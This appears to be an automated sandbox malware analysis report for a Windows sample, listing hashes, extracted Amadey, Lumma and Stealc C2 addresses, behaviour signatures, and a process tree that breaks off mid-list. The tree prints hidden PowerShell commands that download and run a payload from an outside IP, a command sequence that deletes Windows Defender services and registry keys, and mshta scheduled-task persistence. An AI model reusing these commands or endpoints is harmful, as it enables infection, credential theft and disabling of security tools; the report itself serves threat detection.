Analysis

  • max time kernel
    144s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2025, 13:25

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    0b7487b0b78bd7587e0583b13b068f02

  • SHA1

    c55a13d7b730ba5e51511979d11b04d11acf53ab

  • SHA256

    dad41fe11699ffd7e23d5bf0c558966cf6156626752e4a517d0c955cbb7b5b60

  • SHA512

    db7e99356df898fa3176326bcd9198fa138939bcf84a1881de99ea2915aa108703d50ddfb60c11fdfb5660ab88c42b49607b4db9eb829171a9d7deddc5a3edf8

  • SSDEEP

    49152:1U0Hx5st812q2hKXqY84SW6fi5jSJY8xxN0hX:20HxINni5jSnv

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://wxayfarer.live/ALosnz

https://70oreheatq.live/gsopp

https://0castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 25 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Users\Admin\AppData\Local\Temp\22.exe
          "C:\Users\Admin\AppData\Local\Temp\22.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9FC8.tmp\9FC9.tmp\9FCA.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1416
            • C:\Users\Admin\AppData\Local\Temp\22.exe
              "C:\Users\Admin\AppData\Local\Temp\22.exe" go
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of WriteProcessMemory
              PID:2968
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A055.tmp\A065.tmp\A066.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:2184
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:2096
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1636
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:1832
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1400
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:236
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:1680
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:2360
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:968
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:2464
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:2236
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:2312
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:1376
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:2248
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:2844
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:3044
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:2212
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:2160
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:2408
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:2452
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:980
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:2568
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                            PID:2316
                          • C:\Windows\system32\sc.exe
                            sc stop "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:2356
                          • C:\Windows\system32\sc.exe
                            sc delete "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:712
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                            8⤵
                              PID:2480
                            • C:\Windows\system32\sc.exe
                              sc stop "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:2112
                            • C:\Windows\system32\sc.exe
                              sc delete "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:2564
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                              8⤵
                                PID:1412
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:1068
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:604
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                8⤵
                                  PID:2484
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2136
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:1084
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                  8⤵
                                    PID:884
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1584
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:1840
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                    8⤵
                                      PID:1044
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1104
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1572
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:2976
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1772
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1816
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:2196
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:1212
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2276
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:936
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2000
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2036
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:2024
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:1520
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2508
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:1580
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:2260
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:1028
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:320
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:2444
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:2596
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:2472
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:1184
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:112
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2524
                                              • C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:860
                                                • C:\Windows\system32\WerFault.exe
                                                  C:\Windows\system32\WerFault.exe -u -p 860 -s 44
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:1624
                                              • C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2936
                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Adds Run key to start application
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies system certificate store
                                                  PID:3020
                                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2532
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2532 -s 36
                                                      6⤵
                                                      • Loads dropped DLL
                                                      PID:1044
                                                  • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2128
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2128 -s 44
                                                      6⤵
                                                      • Loads dropped DLL
                                                      PID:804
                                                  • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1636
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 1636 -s 36
                                                      6⤵
                                                      • Loads dropped DLL
                                                      PID:1684
                                                  • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1388
                                                    • C:\Users\Admin\AppData\Local\Temp\is-MQH3F.tmp\Bell_Setup16.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-MQH3F.tmp\Bell_Setup16.tmp" /SL5="$5017C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1740
                                                      • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2444
                                                        • C:\Users\Admin\AppData\Local\Temp\is-MU8AR.tmp\Bell_Setup16.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-MU8AR.tmp\Bell_Setup16.tmp" /SL5="$6017C,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:2368
                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                            "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                            9⤵
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2216
                                                  • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:604
                                                  • C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2612
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2612 -s 28
                                                      6⤵
                                                      • Loads dropped DLL
                                                      PID:1184
                                                  • C:\Users\Admin\AppData\Local\Temp\10043990101\2193e61196.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10043990101\2193e61196.exe"
                                                    5⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3156
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10043990101\2193e61196.exe"
                                                      6⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3520
                                                  • C:\Users\Admin\AppData\Local\Temp\10044000101\49ecc66d1b.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10044000101\49ecc66d1b.exe"
                                                    5⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4032
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10044000101\49ecc66d1b.exe"
                                                      6⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3208
                                              • C:\Users\Admin\AppData\Local\Temp\10369180101\cae048f3a7.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10369180101\cae048f3a7.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:1616
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn vZQ3GmarHKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\t7QgXSHnY.hta" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2916
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn vZQ3GmarHKB /tr "mshta C:\Users\Admin\AppData\Local\Temp\t7QgXSHnY.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2584
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta C:\Users\Admin\AppData\Local\Temp\t7QgXSHnY.hta
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Internet Explorer settings
                                                  PID:2984
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RZT0O3GEK0OBBYSZR0QL8UDVWFVV6QDZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1908
                                                    • C:\Users\Admin\AppData\Local\TempRZT0O3GEK0OBBYSZR0QL8UDVWFVV6QDZ.EXE
                                                      "C:\Users\Admin\AppData\Local\TempRZT0O3GEK0OBBYSZR0QL8UDVWFVV6QDZ.EXE"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2968
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2228
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 2
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:2196
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2276
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:936
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1112
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2260
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1952
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1668
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn "QbG1MmaFat6" /tr "mshta \"C:\Temp\lXjZktMPm.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2852
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta "C:\Temp\lXjZktMPm.hta"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Internet Explorer settings
                                                  PID:1508
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:540
                                                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1524
                                              • C:\Users\Admin\AppData\Local\Temp\10369360101\e2017b79e5.exe
